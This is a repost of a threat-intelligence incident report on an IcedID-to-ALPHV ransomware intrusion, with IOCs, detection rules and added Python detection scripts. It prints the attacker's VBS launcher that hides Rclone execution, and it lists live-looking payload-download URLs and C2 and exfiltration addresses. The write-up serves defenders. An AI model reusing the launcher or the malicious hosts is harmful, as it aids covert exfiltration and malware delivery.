The “cslite.exe” CSharp Streamer executable communicated with the IP address 109.236.80.191. During the intrusion, we observed traffic to it across various ports, including 135, 139, 80, 443 and 3389, with most of the traffic on 443 and 3389. Looking at the memory of “cslite.exe” run in a sandbox, we can extract the trojan's configured communication preferences:

The malware uses WebSockets for communication, as shown by the wss:// scheme in the URL. The configuration also shows that communication is set up to go through socket.io as a proxy. If the malware cannot reach a given port, it rotates through a list of alternative ports, likely both to evade ports blocked by the victim's firewall and to obfuscate the communication by changing the port in use over the course of an intrusion.

IP | Port | Domain | JA3 | JA3s | AS Organization | ASN | Geolocation Country
109.236.80.191 | 443 | www.i2rtqyj[.]ekz | c12f54a3f91dc7bafd92cb59fe009a35 | 394441ab65754e2207b1e1b457b3641d | WorldStream B.V. | 49981 | Netherlands

ja4: t12i210600_76e208dd3e22_2dae41c691ec
ja4s: t120200_c02f_ec53b3cc8a64
ja4s: t120400_c02f_12a20535f9be
ja4x: bbd6cc0fca29_4ce939b68fae_79faaa53868b

During the intrusion, we observed several Zeek notice messages alerting on the self-signed certificate used by the CSharp Streamer command and control server.


ScreenConnect

After the initial forked IcedID loader infection, the threat actor deployed ScreenConnect on the beachhead using a renamed binary, “toovey.exe”. Later, ScreenConnect was installed on multiple systems by dropping a renamed installer and executing it through Impacket’s wmiexec.py script.


Exfiltration

While Firefox was used to preview documents, it was also used to download Rclone. When the process command line is not available, defenders can look for web history artifacts. Firefox's web history artifacts are well documented and can be examined directly with an SQLite browser.
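The same lookup can be scripted. The following Python is an added example, not code from the original report: it queries a copy of Firefox's places.sqlite for download events (visits with visit_type 7, TRANSITION_DOWNLOAD) and joins the on-disk destination that Firefox stores as a "downloads/destinationFileURI" annotation in moz_annos. The schema is reduced to the columns the query needs, and the sample rows, URLs and paths it builds in memory are constructed for the example.

```python
"""Extract download events from a Firefox places.sqlite history database.

Added example, not code from the original report. Firefox records visits in
moz_places / moz_historyvisits; a download is a visit with visit_type 7
(TRANSITION_DOWNLOAD) and its on-disk target is stored in moz_annos under the
"downloads/destinationFileURI" attribute. Timestamps are PRTime: microseconds
since the Unix epoch, in UTC. The schema below is reduced to those columns and
the sample rows are constructed for the example.
"""
import sqlite3
from datetime import datetime, timezone

TRANSITION_DOWNLOAD = 7
DEST_ANNO = "downloads/destinationFileURI"

SCHEMA = """
CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url TEXT, title TEXT,
                         last_visit_date INTEGER);
CREATE TABLE moz_historyvisits (id INTEGER PRIMARY KEY, place_id INTEGER,
                                visit_date INTEGER, visit_type INTEGER);
CREATE TABLE moz_anno_attributes (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE moz_annos (id INTEGER PRIMARY KEY, place_id INTEGER,
                        anno_attribute_id INTEGER, content TEXT);
"""


def prtime(iso_utc: str) -> int:
    """ISO-8601 UTC timestamp -> PRTime (microseconds since the epoch)."""
    dt = datetime.fromisoformat(iso_utc).replace(tzinfo=timezone.utc)
    return int(dt.timestamp()) * 1_000_000


def open_places(path: str) -> sqlite3.Connection:
    """Open a *copy* of places.sqlite read-only; Firefox keeps the live file locked."""
    return sqlite3.connect(f"file:{path}?mode=ro&immutable=1", uri=True)


def download_history(conn: sqlite3.Connection):
    """Return (visited_utc, url, destination) for every download, oldest first."""
    rows = conn.execute(
        """
        SELECT v.visit_date, p.url, a.content
        FROM moz_historyvisits v
        JOIN moz_places p ON p.id = v.place_id
        LEFT JOIN moz_annos a
               ON a.place_id = p.id
              AND a.anno_attribute_id = (SELECT id FROM moz_anno_attributes
                                         WHERE name = ?)
        WHERE v.visit_type = ?
        ORDER BY v.visit_date
        """,
        (DEST_ANNO, TRANSITION_DOWNLOAD),
    ).fetchall()
    result = []
    for visit_date, url, dest in rows:
        when = datetime.fromtimestamp(visit_date / 1_000_000, tz=timezone.utc)
        result.append((when.strftime("%Y-%m-%d %H:%M:%S"), url, dest))
    return result


def build_sample_db() -> sqlite3.Connection:
    """Constructed history: one page view, one download, one document preview."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.execute("INSERT INTO moz_anno_attributes VALUES (1, ?)", (DEST_ANNO,))
    conn.executemany("INSERT INTO moz_places VALUES (?, ?, ?, ?)", [
        (1, "https://rclone.org/downloads/", "Rclone downloads",
         prtime("2023-10-12T09:01:00")),
        (2, "https://downloads.rclone.org/rclone-current-windows-amd64.zip", None,
         prtime("2023-10-12T09:02:10")),
        (3, "file:///C:/shares/finance/report.pdf", "report.pdf",
         prtime("2023-10-12T09:10:00")),
    ])
    conn.executemany("INSERT INTO moz_historyvisits VALUES (?, ?, ?, ?)", [
        (1, 1, prtime("2023-10-12T09:01:00"), 1),                   # link click
        (2, 2, prtime("2023-10-12T09:02:10"), TRANSITION_DOWNLOAD),  # download
        (3, 3, prtime("2023-10-12T09:10:00"), 1),                   # preview, not a download
    ])
    conn.execute("INSERT INTO moz_annos VALUES (1, 2, 1, ?)",
                 ("file:///C:/Users/user/Downloads/rclone-current-windows-amd64.zip",))
    return conn


if __name__ == "__main__":
    for when, url, dest in download_history(build_sample_db()):
        print(f"{when}  {url}  ->  {dest}")
```

On a real case, copy places.sqlite (and its -wal file, if present) out of the profile before opening it with open_places(); the immutable=1 flag avoids the lock Firefox holds on the live database. Because the query keys on visit_type rather than on URL patterns, it also surfaces downloads of tools whose names the analyst did not think to search for.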


Rclone was dropped on the file server. This can be detected by looking at file creation, for instance using the event ID 11 from Sysmon.


Rclone was not started directly but was launched through a VBS script named nocmd.vbs, which executes rcl.bat, which in turn runs Rclone. The VBS script hides the batch window by passing a window style of 0 to WshShell.Run:

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "c:\programdata\rcl.bat" & Chr(34), 0
Set WshShell = Nothing

Before that, the threat actor used the Rclone config command, which, according to the documentation, does the following:

enter an interactive configuration session where you can setup new remotes and manage existing ones


Upon execution, network artifacts show an increase in egress traffic to the exfiltration server on port 22 (SSH). An increase in egress traffic, especially to previously unknown hosts or over unusual ports, can be used to detect exfiltration attempts early. Below is a chart of traffic to port 22 over the whole course of the intrusion.
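A network-side check for the pattern just described, as an added example that is not part of the original report: it parses Zeek conn.log records (tab-separated, with the "#fields" header naming the columns and "-" marking unset values), sums the bytes each internal host sends to each external host on tcp/22 per hour, and reports the pairs that cross a threshold. The internal address ranges, the 100 MiB threshold and the log excerpt are all constructed for the example.

```python
"""Flag bursts of outbound SSH (tcp/22) traffic in a Zeek conn.log.

Added example, not code from the original report. The "#fields" header line
names the tab-separated columns; Zeek writes "-" for unset values. Bytes sent
by each internal host to each external host on port 22 are summed per hour and
any (source, destination, hour) above a threshold is reported. The internal
ranges, threshold and log excerpt are constructed for the example.
"""
import ipaddress
from collections import defaultdict
from datetime import datetime, timezone

INTERNAL = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]
SSH_PORT = "22"

# Constructed excerpt: routine admin SSH inside the network, then ~1.4 GiB pushed
# from an internal host to an outside address on port 22 within one hour.
SAMPLE_CONN_LOG = (
    "#separator \\x09\n"
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tduration\torig_bytes\tresp_bytes\n"
    "#types\ttime\tstring\taddr\tport\taddr\tport\tenum\tinterval\tcount\tcount\n"
    "1697101200.1\tC1\t10.0.1.15\t51000\t10.0.9.9\t22\ttcp\t30.0\t4096\t2048\n"
    "1697104800.4\tC2\t10.0.1.15\t51001\t10.0.9.9\t22\ttcp\t25.0\t3000\t1500\n"
    "1697108400.0\tC3\t10.0.2.50\t49152\t203.0.113.8\t22\ttcp\t900.0\t734003200\t1048576\n"
    "1697109000.7\tC4\t10.0.2.50\t49153\t203.0.113.8\t22\ttcp\t880.0\t805306368\t1048576\n"
    "1697110500.2\tC5\t10.0.2.50\t49154\t203.0.113.8\t22\ttcp\t-\t-\t-\n"
    "1697112000.2\tC6\t10.0.2.50\t49155\t203.0.113.8\t443\ttcp\t5.0\t1200\t8000\n"
)


def parse_conn_log(text: str):
    """Yield one dict per record, keyed by the column names from the #fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split("\t")))


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)


def ssh_egress_by_hour(records):
    """Sum orig_bytes per (src, dst, UTC hour) for tcp/22 flows leaving the internal ranges."""
    totals = defaultdict(int)
    for r in records:
        if r["id.resp_p"] != SSH_PORT or r["proto"] != "tcp" or r["orig_bytes"] == "-":
            continue
        if not is_internal(r["id.orig_h"]) or is_internal(r["id.resp_h"]):
            continue
        bucket = int(float(r["ts"])) // 3600 * 3600
        hour = datetime.fromtimestamp(bucket, tz=timezone.utc).strftime("%Y-%m-%d %H:00Z")
        totals[(r["id.orig_h"], r["id.resp_h"], hour)] += int(r["orig_bytes"])
    return dict(totals)


def flag_ssh_egress(text: str, threshold_bytes: int = 100 * 1024 * 1024):
    """Return (src, dst, hour, bytes) tuples at or above the threshold, largest first."""
    totals = ssh_egress_by_hour(parse_conn_log(text))
    hits = [(src, dst, hour, b) for (src, dst, hour), b in totals.items() if b >= threshold_bytes]
    return sorted(hits, key=lambda h: h[3], reverse=True)


if __name__ == "__main__":
    for src, dst, hour, b in flag_ssh_egress(SAMPLE_CONN_LOG):
        print(f"{hour}  {src} -> {dst}:22  {b / 2**20:.0f} MiB sent")
```

The check deliberately uses orig_bytes (bytes sent by the internal host) rather than total bytes, since exfiltration is asymmetric: a backup or file server pushing hundreds of megabytes to an address that never receives interactive SSH from it stands out even when the destination port is a legitimate service port. Tune INTERNAL and the threshold to the environment, and add an allow-list of known SSH peers (jump hosts, backup targets) before alerting on it.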


Exfiltration server data:

IP | Port | Domain | AS Organization | ASN | Geolocation Country
217.23.12.8 | 22 | N/A | WorldStream B.V. | 49981 | Netherlands

Impact

On the eighth day of the intrusion, the threat actor moved toward their final objective, deploying ALPHV Ransomware. This started with the threat actor staging two files on the backup server.


“setup.exe”, which was dropped twice, was simply the latest ScreenConnect installer the adversary employed during the intrusion. “BNUfUOmFT2.exe” was the ransomware binary.

First, they used the Windows xcopy utility to copy the ScreenConnect installer to the root of the C$ share on hosts across the domain:


Second, they remotely ran the installer on hosts using WMI commands:


Third, they repeated the process, copying the ransomware payload from the backup server to the domain joined hosts in the network.


Finally, they used this same method to execute the ransomware remotely via WMI:


On the remote hosts, “WmiPrvSE.exe” was observed as the parent process executing the task.
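The four steps above leave a recognisable pair of host artifacts: a copy command whose destination is the root of a remote admin share, followed on the target by a process started from the drive root with WmiPrvSE.exe as its parent. The following Python is an added example, not code from the original report; it triages Sysmon Event ID 1 records (modelled as dicts with Sysmon's field names) for both signs and pairs them up. The host names, users and command lines in the sample are constructed.

```python
"""Triage Sysmon process-creation (Event ID 1) records for the two steps
described above: a payload copied into the root of a remote C$ share, then
started through WMI so that WmiPrvSE.exe is its parent on the target host.

Added example, not code from the original report. Events are dicts keyed by
Sysmon field names; the host names, users and command lines are constructed.
"""
import ntpath
import re

WMIPRVSE = "wmiprvse.exe"
COPY_TOOLS = {"xcopy.exe", "robocopy.exe", "cmd.exe"}
# \\HOST\C$\<rest> ; an empty <rest> means the file landed in the share root
ADMIN_SHARE_DEST = re.compile(r"\\\\(?P<host>[\w.-]+)\\[A-Za-z]\$\\(?P<rest>\S*)", re.IGNORECASE)
# C:\something.exe with no further directory component
DRIVE_ROOT_EXE = re.compile(r"^[A-Za-z]:\\[^\\]+\.exe$", re.IGNORECASE)

SAMPLE_EVENTS = [
    {"Computer": "BACKUP01", "User": "CORP\\admin",
     "Image": "C:\\Windows\\System32\\xcopy.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "xcopy C:\\ProgramData\\setup.exe \\\\FS01\\C$\\ /Y"},
    {"Computer": "FS01", "User": "CORP\\admin",
     "Image": "C:\\setup.exe", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "C:\\setup.exe"},
    {"Computer": "FS01", "User": "NT AUTHORITY\\SYSTEM",
     "Image": "C:\\Windows\\System32\\svchost.exe", "ParentImage": "C:\\Windows\\System32\\services.exe",
     "CommandLine": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
    {"Computer": "WS02", "User": "CORP\\admin",
     "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /c hostname"},          # WMI-spawned, but not from a drive root
    {"Computer": "WS02", "User": "CORP\\admin",
     "Image": "C:\\payload.exe", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "C:\\payload.exe"},              # no staging copy in this excerpt
]


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def admin_share_copies(events):
    """(source host, destination host, file name) for copies into a remote admin-share root.

    The source path is taken as the token before the \\\\HOST\\C$\\ destination, which
    covers 'xcopy <src> <dst>' and 'cmd /c copy <src> <dst>'; quoted paths containing
    spaces would need real argument splitting.
    """
    hits = []
    for e in events:
        if basename(e["Image"]) not in COPY_TOOLS:
            continue
        tokens = e["CommandLine"].split()
        for i, tok in enumerate(tokens):
            m = ADMIN_SHARE_DEST.search(tok)
            if m and i > 0 and "\\" not in m.group("rest"):
                hits.append((e["Computer"], m.group("host"), basename(tokens[i - 1])))
                break
    return hits


def wmi_launched_root_exes(events):
    """Processes whose parent is WmiPrvSE.exe and whose image sits directly in a drive root."""
    return [e for e in events
            if basename(e["ParentImage"]) == WMIPRVSE and DRIVE_ROOT_EXE.match(e["Image"])]


def correlate(events):
    """Pair each WMI-launched root executable with the copy that staged it, if one was seen."""
    staged = {(host.lower(), name) for _, host, name in admin_share_copies(events)}
    findings = []
    for e in wmi_launched_root_exes(events):
        key = (e["Computer"].lower(), basename(e["Image"]))
        verdict = "staged via admin share" if key in staged else "no staging copy seen"
        findings.append((e["Computer"], e["Image"], verdict))
    return findings


if __name__ == "__main__":
    for host, image, verdict in correlate(SAMPLE_EVENTS):
        print(f"{host}: {image} launched by WmiPrvSE.exe ({verdict})")
```

WmiPrvSE.exe legitimately spawns cmd.exe and other system binaries, so the WMI rule keys on the unusual image location (a drive root) rather than on the parent alone; the staging rule complements it by naming the host that pushed the file, which is the one to image first.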


During the ransomware deployment phase, we observed the threat actor deleting all the backups interactively.


After completing the encryption of files, the following note was left on the infected hosts; it directs the reader to Twitter to identify the group behind the attack:


Timeline


Diamond Model


Indicators

Atomic

CobaltStrike
85.209.11[.]48 

CSharp Streamer
109.236.80[.]191 

Data exfiltration
217.23.12[.]8 

Forked IcedID Loader
212.18.104[.]12 / modalefastnow[.]com

2nd Stage IcedID payload
92.118.112[.]113 / hofsaalos[.]com
173.255.204[.]62 / jkbarmossen[.]com
94.232.46[.]27 / evinakortu[.]com
77.105.140[.]181 / jerryposter[.]com
77.105.142[.]135 / skrechelres[.]com

URLs
http[:]//85.209.11[.]48:80/download/test1.exe 
http[:]//85.209.11[.]48:80/download/http64.exe
http[:]//85.209.11[.]48:80/download/csss.exe 
http[:]//85.209.11[.]48:80/ksajSk
http[:]//85.209.11[.]48:80/ksaid
http[:]//temp[.]sh/VSlAV/http64.exe

Computed

cscs.exe
	 99d8c3e7806d71a2b6b28be525c8e10e
	 59791ec1c857d714f9b4ad6c15a78191206a7343
	 5d1817065266822df9fa6e8c5589534e031bb6a02493007f88d51a9cfb92e89b 

cscss.exe
	 08fcf90499526a0a41797f8fdd67d107
	 7d130ace197f4148932306facfc8d71fa8738d86
	 c2ddb954877dcfbb62fd615a102ce5fa69f4525abc1884e8fe65b0c2b120cfd4
		  
cscssss.exe
	 26239fa16d0350b2224bfb07e37cbd84
	 8837ad1bafb56019a46822da0ed8b468f380c80d
	 7d2e705dcaa9f36fb132b7ff329f61dd5d0393c28dcd53b2be1e3ba85c633360
 
ccs.exe
	2b1b2b271bc78e67beca2dcd04354189
	c83da151f26a58aecb24fc6ba4945acb934ee954
	bd4876f7efbd18a03bbb401a5dc77ed68ef95c72a3f7be83cef39a4515e0c476

rclone.exe
	581cfc2d4e02a16b9b2f8dcb70a46b8b
	1d345799307c9436698245e7383914b3a187f1ec
	9c5b233efb2e2a92a65b5ee31787281dd043a342c80c7ac567ccf43be2f2843f

BNUfUOmFT2.exe
	7ff0241b28d766198743d661a2f67620
	27acb306baec022a974db50a90f48183541e12fe
	94d6395dcab01250650e884f591956464d582a4f1f5da948055e6d2f0a215ace

confucius_cpp.exe
	fb34b1fb80b053e69d89af5330cd7d4b
	e97b00ef58fe081170137536f28df590dbb41a0e
	dfa8c282178a509346fb0154e6dbd5fbb0b56c38894ce7d244f5ca26d6820e67

cslite.exe
	642bf60f06bb043c4a74d0501597cf5e
	e1bc0c7cf030af31522c1160e0c70df5cecbb64a
	4103cc8017409963b417c87259af2a955653567cdbf7d5504198dd350f9ef9c1

https64.dll
	5548caa3b8cdd73b3a56f3f102942882
	e43ecd2f6859e4769028fbd7176bb3339393ea22
	d8f51dcfe928a1674e8d88029a404005ab826527372422cac24c81467440feb0

http64.dll
	0decfd5e200803523c0437ff7aac7349
	be8fd3c3507f02785da6f12c9b21ff73638cdf23
	cd0e941587672ab1517681a7e3b4f93a00020f8c8c8479a76b9e3555bcd04121

ccslt.exe
	5cbb08cd26162e8046df17d15ba6e907
	41f47f8ee34c9ae7a4bb43b71e3cc85266302e8e
	6a6cd64fba34aadad2df808b0fcab89ef26a897040268b24fed694036cc51d6a 

iwiqocacod.dll
	efb019b1999d478a4161a030a5d9302e
	514ddcf981d7d8684b3ac20e902f5017292d51c5
	bc49622009b29c23ee762fe6f000936eb1c4c1b29496d5382f175c99ad941aac

JNOV0135_7747811.zip
	24701208c439b00a43908ae39bbf7de8
	25ef7044cdf9b7c17253625a2bd5d2d6fee44227
	3336bfde9b6b8ef05f1d704d247a1a8fd0641afaecc6a71f5cfa861234c4317b

[2023.10.11_08-07].vbs
	4ff5625e6bd063811ec393b315d2c714
	42b188e2e015a72accc50fcbde2d2c81f5258d0b
	5bab2bc0843f9d5124b39f80e12ad6d1f02416b0340d7cfec8cf7b14cd4385bf

0370-1.dll
	bf15a998fd84bee284ae9f7422bda640
	e51217efb6e33fca9f7c5f51e5c3a4ae50499a37
	fab34d1f0f906f64f95b9f244ae1fe090427e606a9c808c720e18e93a08ed84d

netscan.exe
	a768244ca664349a6d1af84a712083c0
	39300863bcaad71e5d4efc9a1cae118440aa778f
	e14ba0fb92e16bb7db3b1efac4b13aee178542c6994543e7535d8efaa589870c

nocmd.vbs
	d28271ed838464d1debab434ef6d8e37
	2741c136b92aca1e890d2b67084c6867d3cbaa87
	457a2f29d395c04a6ad6012fab4d30e04d99d7fc8640a9ee92e314185cc741d3

rcl.bat
	00c3f790f6e329530a6473882007c3e5
	b02db8c2b9614e986e58f6e31be686b418f9aba7
	6f3a02674b6bbf05af8a90077da6e496cc47dda9101493b8103f0f2b4e4fd958

Detections

Network

ET INFO Executable Download from dotted-quad Host
ETPRO HUNTING Windows BITS UA Retrieving EXE
ET HUNTING Suspicious BITS EXE DL From Dotted Quad
ET POLICY PE EXE or DLL Windows file download HTTP
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
ETPRO HUNTING Windows BITS UA Retrieving EXE M2
ETPRO POLICY Observed MS Certutil User-Agent in HTTP Request
ETPRO MALWARE Likely Evil Certutil Retrieving EXE
ThreatFox payload delivery (domain - confidence level: 100%)
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
ThreatFox Cobalt Strike botnet C2 traffic (ip:port - confidence level: 80%)
ET INFO Packed Executable Download
ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1
ET MALWARE Cobalt Strike Beacon Observed
ET MALWARE Win32/IcedID Requesting Encoded Binary M4
ET MALWARE Win32/IcedID Request Cookie
ET SCAN Potential SSH Scan OUTBOUND 

Sigma

Search for the rules on detection.fyi or sigmasearchengine.com

DFIR Report Public Repo:

8a0d153f-b4e4-4ea7-9335-892dfbe17221: NetScan Share Enumeration Write Access Check
dfbdd206-6cf2-4db9-93a6-0b7e14d5f02f: CHCP CodePage Locale Lookup

DFIR Report Private Repo:

7019b8b4-d23e-4d35-b5fa-192ffb8cb3ee: Use of Rclone to exfiltrate data over an SSH channel
a09079c2-e4af-4963-84d2-d65c2fb332f5: Detection of CertUtil Misuse for Malicious File Download
6f77de5c-27af-435b-b530-e2d07b77a980: Impacket Tool Execution
6fc673ac-ec2f-4de8-8a14-a395f1b2b531: Potential CSharp Streamer RAT loading binary from APPDATA
879ddba7-5cb9-484f-88a4-c1d87034166f: Suspicious ScreenConnect Script Execution

Sigma Repo:

90f138c1-f578-4ac3-8c49-eecfd847c8b7: BITS Transfer Job Download From Direct IP
10c14723-61c7-4c75-92ca-9af245723ad2: HackTool - Potential Impacket Lateral Movement Activity
b1f73849-6329-4069-bc8f-78a604bb8b23: Remote Access Tool - ScreenConnect Remote Command Execution
90b63c33-2b97-4631-a011-ceb0f47b77c3: Suspicious Execution From GUID Like Folder Names
19b08b1c-861d-4e75-a1ef-ea0c1baf202b: Suspicious Download Via Certutil.EXE
d059842b-6b9d-4ed1-b5c3-5b89143c6ede: File Download Via Bitsadmin
e37db05d-d1f9-49c8-b464-cee1a4b11638: PUA - Rclone Execution
7090adee-82e2-4269-bd59-80691e7c6338: Console CodePage Lookup Via CHCP
d5601f8c-b26f-4ab0-9035-69e11a8d4ad2: CobaltStrike Named Pipe
c8557060-9221-4448-8794-96320e6f3e74: Windows PowerShell User Agent
1edff897-9146-48d2-9066-52e8d8f80a2f: Suspicious Invoke-WebRequest Execution With DirectIP
0ef56343-059e-4cb6-adc1-4c3c967c5e46: Suspicious Execution of Systeminfo
903076ff-f442-475a-b667-4f246bcc203b: Nltest.EXE Execution
5cc90652-4cbd-4241-aa3b-4b462fa5a248: Potential Recon Activity Via Nltest.EXE
624f1f33-ee38-4bbe-9f4a-088014e0c26b: IcedID Malware Execution Patterns

Yara

https://github.com/The-DFIR-Report/Yara-Rules/blob/main/24952/24952.yar

MITRE ATT&CK


LSASS Memory - T1003.001
DCSync - T1003.006
System Network Configuration Discovery - T1016
Remote System Discovery - T1018
Automated Exfiltration - T1020
Remote Desktop Protocol - T1021.001
System Owner/User Discovery - T1033
Data from Network Shared Drive - T1039
Commonly Used Port - T1043
Scheduled Task - T1053.005
PowerShell - T1059.001
Windows Command Shell - T1059.003
Visual Basic - T1059.005
Domain Groups - T1069.002
Web Protocols - T1071.001
Domain Accounts - T1078.002
System Information Discovery - T1082
File and Directory Discovery - T1083
Local Account - T1087.001
Domain Account - T1087.002
Network Share Discovery - T1135
BITS Jobs - T1197
Malicious File - T1204.002
Data from Information Repositories - T1213
Regsvr32 - T1218.010
Rundll32 - T1218.011
Remote Access Software - T1219
Domain Trust Discovery - T1482
Data Encrypted for Impact - T1486
Archive via Utility - T1560.001
Phishing - T1566
Service Execution - T1569.002
System Language Discovery - T1614.001
Indicator Removal: File Deletion - T1070.004

Originally published by thedfirreport: IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Copyright notice: posted by admin on 11 June 2024 at 09:33.
Please credit when reposting: IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment | CTF导航